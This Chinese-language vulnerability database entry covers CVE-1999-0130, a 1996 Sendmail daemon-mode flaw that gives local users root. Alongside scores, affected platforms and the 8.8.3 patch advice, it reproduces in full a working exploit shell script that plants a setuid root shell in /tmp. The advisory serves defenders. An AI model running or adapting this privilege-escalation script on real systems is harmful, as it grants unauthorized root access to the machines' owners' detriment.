CVE-1999-0130
CVSS7.2
发布时间 :1996-11-16 00:00:00
修订时间 :2008-09-09 08:33:49
NMCOE    

[原文]Local users can start Sendmail in daemon mode and gain root privileges.


[CNNVD]Berkeley Sendmail Daemon模式漏洞(CNNVD-199611-004)

        运行在Demon模式下的Sendmail存在漏洞,本地用户可以借助此漏洞获取根特权。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:eric_allman:sendmail:8.8
cpe:/o:freebsd:freebsd:2.1.6FreeBSD 2.1.6
cpe:/o:hp:hp-ux:10.10HP HP-UX 10.10
cpe:/a:eric_allman:sendmail:8.7
cpe:/o:bsdi:bsd_os:2.1
cpe:/o:redhat:linux:4.0Red Hat Linux 4.0
cpe:/a:caldera:network_desktop:1.0
cpe:/o:freebsd:freebsd:2.1.5FreeBSD 2.1.5
cpe:/a:eric_allman:sendmail:8.8.2
cpe:/a:eric_allman:sendmail:8.8.1
cpe:/o:ibm:aix:4.2IBM AIX 4.2
cpe:/o:hp:hp-ux:10.00HP HP-UX 10.00
cpe:/o:hp:hp-ux:10.20HP HP-UX 10.20
cpe:/o:hp:hp-ux:10.01HP HP-UX 10.01

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0130
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0130
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199611-004
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/716
(UNKNOWN)  BID  716

- 漏洞信息

Berkeley Sendmail Daemon模式漏洞
高危 输入验证
1996-11-16 00:00:00 2005-05-02 00:00:00
本地  
        运行在Demon模式下的Sendmail存在漏洞,本地用户可以借助此漏洞获取根特权。

- 公告与补丁

        Install version 8.8.3 of sendmail or install a vendor supplied patch.

- 漏洞信息 (19556)

BSD 2,CND 1,Sendmail 8.x,FreeBSD 2.1.x,HP-UX 10.x,AIX 4,RedHat 4 Sendmail Daemon Vuln (EDBID:19556)
multiple local
1996-11-16 Verified
0 Leshka Zakharoff
N/A [点击下载]
BSD/OS 2.1,Caldera Network Desktop 1.0,Eric Allman Sendmail <= 8.8.2,FreeBSD 2.1.5/2.1.6,HP-UX <= 10.20,AIX 4.2,RedHat 4.0 Sendmail Daemon Mode Vulnerability

source: http://www.securityfocus.com/bid/716/info

Sendmail is often run in daemon mode so that it can "listen" for incoming mail connections on the standard SMTP networking port, usually port 25. The root user is the only user allowed to start sendmail this way, and sendmail contains code intended to enforce this restriction.

Unfortunately, due to a coding error, sendmail can be invoked in daemon mode in a way that bypasses the built-in check. When the check is bypassed, any local user is able to start sendmail in daemon mode. In addition, as of version 8.7, sendmail will restart itself when it receives a SIGHUP signal. It does this restarting operation by re-executing itself using the exec(2) system call. Re-executing is done as the root user. By manipulating the sendmail environment, the user can then have sendmail execute an arbitrary program with root privileges. 

#!/bin/sh
#
#
# Hi !
# This is exploit for sendmail smtpd bug
# (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
# This shell script does a root shell in /tmp directory.
# If you have any problems with it, drop me a letter.
# Have fun !
#
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady ------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
echo 'main() '>>leshka.c
echo '{ '>>leshka.c
echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
echo '} '>>leshka.c
#
#
echo 'main() '>>smtpd.c
echo '{ '>>smtpd.c
echo ' setuid(0); setgid(0); '>>smtpd.c
echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
echo '} '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
/tmp/sh

		

- 漏洞信息

1114
Sendmail Daemon Mode Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified, Third-party Verified

- 漏洞描述

- 时间线

1996-11-21 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 8.8.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站